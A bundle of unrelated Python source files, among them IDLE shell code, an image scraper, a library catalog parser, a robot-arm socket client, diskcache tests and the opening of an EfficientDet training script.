self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
self.console.write(self.prompt)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def show_warning(self, msg):
width = self.interp.tkconsole.width
wrapper = TextWrapper(width=width, tabsize=8, expand_tabs=True)
wrapped_msg = '\n'.join(wrapper.wrap(msg))
if not wrapped_msg.endswith('\n'):
wrapped_msg += '\n'
self.per.bottom.insert("iomark linestart", wrapped_msg, "stderr")
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
self.ctip.remove_calltip_window()
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif not macosx.isAquaTk():
if TkVersion >= 8.6:
ext = '.png'
sizes = (16, 32, 48, 256)
else:
ext = '.gif'
sizes = (16, 32, 48)
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in sizes]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic issues and print warning message(s) in
# the IDLE shell window; this is less intrusive than always
# opening a separate window.
# Warn if using a problematic OS X Tk version.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.show_warning(tkversionwarning)
# Warn if the "Prefer tabs when opening documents" system
# preference is set to "Always".
prefer_tabs_preference_warning = macosx.preferTabsPreferenceWarning()
if prefer_tabs_preference_warning:
shell.show_warning(prefer_tabs_preference_warning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
kaliya.py | """Kalia image web scraper
Uses multiple methods to download images from specific source
"""
__version__ = '0.7'
__author__ = 'axell'
import math
import os
import re
import sys
from multiprocessing import Process, active_children
from pathlib import Path
from time import gmtime, sleep, strftime
import click
import requests
from bs4 import BeautifulSoup
def echo(string):
"""Later on this could be set to point to file
instead of stdout
"""
action = {
"warning": f"\033[0;33m {string} \033[0m",
"error": f"\033[0;31m {string} \033[0m",
"succes": f"\033[92m {string} \033[0m",
}
print(action.get(re.search(r"\w+", string).group().lower(), string))
def check_value(value, error_line):
if not value:
#FIXME: print rather varibable than value
echo(f"[Error] {error_line} \n {value or ''}")
raise ValueError(f"Missing value, {error_line}")
return value
def write_to_db(data):
with open(f"{Path.home()}/.kaliya.list", "a+") as stream:
stream.seek(0)
current_data = [val.strip() for val in stream.readlines() if val]
if not data or data in current_data:
return
stream.seek(2)
stream.write(f"{data}\n")
def print_from_db():
"""
TODO: setup sqlite3 database https://docs.python.org/3.8/library/sqlite3.html
TODO: DRY can I fix this?
"""
with open("f{str(Path.home())}/.kaliya.list", "a+") as stream:
current_data = [x.strip() for x in stream.readlines() if x]
stream.seek(0)
for index, line in enumerate(current_data):
echo(f"{index}): {line}")
def get_data_from_url_advanced(link):
echo(
"[WARNING] Using tools to download content - this will take some time..."
)
if True:
echo("[SUCCES] Images had been found")
#TODO: Here goes pypeteer data
return None
def get_data_from_url_simple(url, secondary_mode=False):
"""
Normal stands for downloading bytes like images etc, normal true in
to search images
"""
try:
check_value(url, "Bad link")
url = f"http://{url.split('//')[1]}"
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
return requests.get(url, headers=headers)
except Exception as err:
echo(f"[Error] {err}")
def find_images_in_website_data(soup, website_data, website_url):
parsed_link_data = [link.get("href") for link in soup.find_all("a", href=True)]
parsed_img_data = [link.get("src") for link in soup.find_all("img")]
found_url_images = []
for data in (parsed_link_data + parsed_img_data):
if re.match(r"[https?:]?\/\/[\w\.\/\d-]*\.(jpe?g|png|gif)", data):
found_url_images.append(data)
elif re.match(r"[-a-zA-Z\d]+\.(jpe?g|png|gif)", data):
found_url_images.append(f"{website_url}/{data}")
else:
continue
return found_url_images
def shut_down():
for process in active_children():
echo(f"Shutting down process {process}")
process.terminate()
process.join()
def supported_format(magic_num):
supported_files = {
"jpeg": {"magic_number": "FFD8", "size": 4},
"png": {"magic_number": "89504E470D0A1A0A", "size": 16},
"gif89a": {"magic_number": "474946383961", "size": 12},
"gif87a": {"magic_number": "474946383761", "size": 12},
}
for key, value in supported_files.items():
if magic_num[:value["size"]] == value["magic_number"]:
return key
return None
def separate_data_into_proceses(parsed_data):
proc_num = math.ceil(len(parsed_data) / 10)
number = int(len(parsed_data) / proc_num)
for i in range(proc_num):
index = int(i * number)
yield parsed_data[index:(index + number)]
def create_image_file(directory, url):
def detect_and_fix(link):
#Should I really need to fix link here?
return link
def get_magic_num(data):
return "".join(["{:02X}".format(b) for b in data[:8]][:8])
file_name = url.split('/')[-1]
full_path = f"{directory}/{file_name}"
if os.path.isfile(full_path):
return
image_data = get_data_from_url_simple(detect_and_fix(url)).content
if supported_format(get_magic_num(image_data)):
with open(full_path, "wb") as image_file:
image_file.write(image_data)
echo(f"[{strftime('%H:%M:%S', gmtime())}] {full_path}")
else:
echo("[ERROR] Image not supported")
def download_images_from_url(url, workpath):
def parse_title(soup):
try:
title = soup.title.text
clean_data = [data.strip() for data in title.split('-') if not '/' in data]
title = " ".join(sorted(clean_data, key=lambda x: len(x), reverse=False))
except AttributeError:
echo(
"[WARNING] Sorry could not find page title.\nSet title: "
)
title = input("Set new title: ")
return title
website_data = get_data_from_url_simple(url)
soup = BeautifulSoup(
check_value(website_data, "Not found web data").text,
"html.parser"
)
workpath = f"{workpath}/{parse_title(soup)}"
os.makedirs(workpath, exist_ok=True)
echo("[SUCCES] Creating folder")
found_parsed_img = find_images_in_website_data(soup, website_data, url)
if not found_parsed_img:
echo(
"[WARNING] No images found using advanced search"
)
found_parsed_img = get_data_from_url_advanced(url)
check_value(found_parsed_img, "Didn't find any supported images:")
write_to_db(url)
for values in separate_data_into_proceses(found_parsed_img):
try:
Process(target=loop, args=(workpath,values)).start()
except ValueError:
continue
def loop(path, values):
check_value(values, "Bad input for process")
for link in values:
create_image_file(path, link)
@click.command()
@click.argument("urls", nargs=-1)
@click.option("-r", "--refresh", is_flag=True, help="Refresh script every 5 minutes to check for new images")
@click.option("-l", "--last", is_flag=True, help="Show history information about downloading images")
@click.option("-i", "--ignore", is_flag=True, help="Ignore title setup just use founded on site")
def main(urls, refresh, last, ignore):
def process_all_data(input_links):
"""
If this goes second time for same data it will
skip already data that exist locally
"""
for link in input_links:
try:
download_images_from_url(link, Path.cwd())
except ValueError:
continue
if last:
print_from_db()
return
while True:
process_all_data(urls)
if not refresh:
break
sleep(300)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
shut_down()
sys.exit()
|
parse.py | import httpx
import threading
from lxml.etree import HTML
from getAPT import getAuthor, getPT
class Book:
def __init__(self, page=1):
self.ls = []
self.page = page
def _searchBook(self, title, page, publisher, author, isbn, year, doctype, lang_code, sort, orderby, onlylendable):
searchUrl = "https://catalog.xmu.edu.cn/opac/openlink.php"
params = {
"title": title,
"page": page,
"publisher": publisher,
"author": author,
"isbn": isbn,
"year": year,
"doctype": doctype,
"lang_code": lang_code,
"sort": sort,
"orderby": orderby,
"onlylendable": onlylendable
}
searchResult = httpx.get(searchUrl, params=params)
if searchResult.status_code != 200:
return
pageResult = HTML(searchResult.text)
try:
self.bookNum = int(pageResult.xpath("//*[@class='book_article']/div[1]/p/strong/text()")[0])
except IndexError:
self.bookNum = 0
recordList = pageResult.xpath("//li[@class='book_list_info']")
for record in recordList:
bookDetail = {}
bookDetail["link"] = searchUrl[:-12] + record.xpath("./h3/a/@href")[0]
bookDetail["name"] = record.xpath("./h3/a//text()")[0].replace("/", "").strip()
bookDetail["author"] = getAuthor(record.xpath("./p/text()")[1])
bookDetail["press"], bookDetail["publishTime"] = getPT(record.xpath("./p/text()")[2], bookDetail["author"])
bookDetail["copyNum"] = int(record.xpath("./p/span/text()")[0].strip()[-1])
bookDetail["availableNum"] = int(record.xpath("./p/span/text()")[1].strip()[-1])
self.ls.append(bookDetail)
def startSearchBook(self, title, publisher, author, isbn, year, doctype, lang_code, sort, orderby, onlylendable):
threads = []
for i in range(self.page, self.page+20):
t = threading.Thread(target=self._searchBook, kwargs={"title": title, "page": i, "publisher": publisher, "author": author, "isbn": isbn, "year": year, "doctype": doctype, "lang_code": lang_code, "sort": sort, "orderby": orderby, "onlylendable": onlylendable})
threads.append(t)
t.start()
for t in threads:
t.join()
self.ls.sort(key=lambda some: int(some["name"].split(".")[0]))
for i in range(len(self.ls)-1):
if self.ls[i]["name"].split(".")[0] == self.ls[i+1]["name"].split(".")[0]:
self.ls[i] = None
self.ls = [book for book in self.ls if book is not None]
return {"bookNum": self.bookNum, "recordInfo": self.ls}
def getBookInfo(self, url):
borrowInfo = []
bookResult = httpx.get(url)
if bookResult.status_code != 200:
return borrowInfo
bookPage = HTML(bookResult.text)
try:
copies = bookPage.xpath("//*[@class='whitetext']")
except IndexError:
return borrowInfo
try:
_ = copies[0].xpath("./td[1]/text()")[0].strip()
except:
return borrowInfo
for copy in copies:
borrowDetail = {}
try:
borrowDetail["index"] = copy.xpath("./td[1]/text()")[0].strip()
borrowDetail["id"] = copy.xpath("./td[2]/text()")[0].strip()
borrowDetail["volume"] = copy.xpath("./td[3]/text()")[0].strip()
borrowDetail["location"] = copy.xpath("./td[4]/text()")[0].strip()
borrowDetail["state"] = copy.xpath("./td[5]//text()")[0].strip()
except:
pass
borrowInfo.append(borrowDetail)
return borrowInfo
|
Hiwin_RT605_ArmCommand_Socket_20190627200136.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command(s):
global arm_mode_flag,data
# if arm_mode_flag == True:
# arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", s)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
s.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
utils.py | import datetime
import functools
import os
import sys
import threading
import warnings
def deprecated(func):
@functools.wraps(func)
def new_func(*args, **kwargs):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn(
'Call to deprecated function {}.'.format(func.__name__),
category=DeprecationWarning,
stacklevel=2
)
warnings.simplefilter('default', DeprecationWarning)
return func(*args, **kwargs)
return new_func
def exclude_keys(_dict, values):
for value in values:
_dict.pop(value)
return _dict
def get_dir_files(directory):
return os.listdir(directory if directory else '.')
def get_current_directory():
return os.getcwd() + os.path.normpath('/')
def get_platform():
return sys.platform
def unix_to_date(unix_timestamp):
date = datetime.datetime.fromtimestamp(unix_timestamp)
return date.strftime('%b %d %Y %H:%M:%S')
def asynchronous(func):
@functools.wraps(func)
def asynchronous_func(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return asynchronous_func
|
test_recipes.py | """Test diskcache.recipes."""
import shutil
import threading
import time
import pytest
import diskcache as dc
@pytest.fixture
def cache():
with dc.Cache() as cache:
yield cache
shutil.rmtree(cache.directory, ignore_errors=True)
def test_averager(cache):
nums = dc.Averager(cache, 'nums')
for i in range(10):
nums.add(i)
assert nums.get() == 4.5
assert nums.pop() == 4.5
for i in range(20):
nums.add(i)
assert nums.get() == 9.5
assert nums.pop() == 9.5
def test_lock(cache):
state = {'num': 0}
lock = dc.Lock(cache, 'demo')
def worker():
state['num'] += 1
with lock:
assert lock.locked()
state['num'] += 1
time.sleep(0.1)
with lock:
thread = threading.Thread(target=worker)
thread.start()
time.sleep(0.1)
assert state['num'] == 1
thread.join()
assert state['num'] == 2
def test_rlock(cache):
state = {'num': 0}
rlock = dc.RLock(cache, 'demo')
def worker():
state['num'] += 1
with rlock:
with rlock:
state['num'] += 1
time.sleep(0.1)
with rlock:
thread = threading.Thread(target=worker)
thread.start()
time.sleep(0.1)
assert state['num'] == 1
thread.join()
assert state['num'] == 2
def test_semaphore(cache):
state = {'num': 0}
semaphore = dc.BoundedSemaphore(cache, 'demo', value=3)
def worker():
state['num'] += 1
with semaphore:
state['num'] += 1
time.sleep(0.1)
semaphore.acquire()
semaphore.acquire()
with semaphore:
thread = threading.Thread(target=worker)
thread.start()
time.sleep(0.1)
assert state['num'] == 1
thread.join()
assert state['num'] == 2
semaphore.release()
semaphore.release()
def test_memoize_stampede(cache):
state = {'num': 0}
@dc.memoize_stampede(cache, 0.1)
def worker(num):
time.sleep(0.01)
state['num'] += 1
return num
start = time.time()
while (time.time() - start) < 1:
worker(100)
assert state['num'] > 0
|
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import os
import pathlib
import sys
os.chdir(str(pathlib.Path(__file__).parent.absolute())+'/')
sys.path.append(str(pathlib.Path(__file__).parent.absolute()))
import multiprocessing
from functools import partial
from absl import app
from absl import flags
from absl import logging
import numpy as np
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'horovod', ''],
'Training: horovod for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=8,
help='Number of TPU cores per'
'replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 4, 2, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'The number of samples for '
'evaluation.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
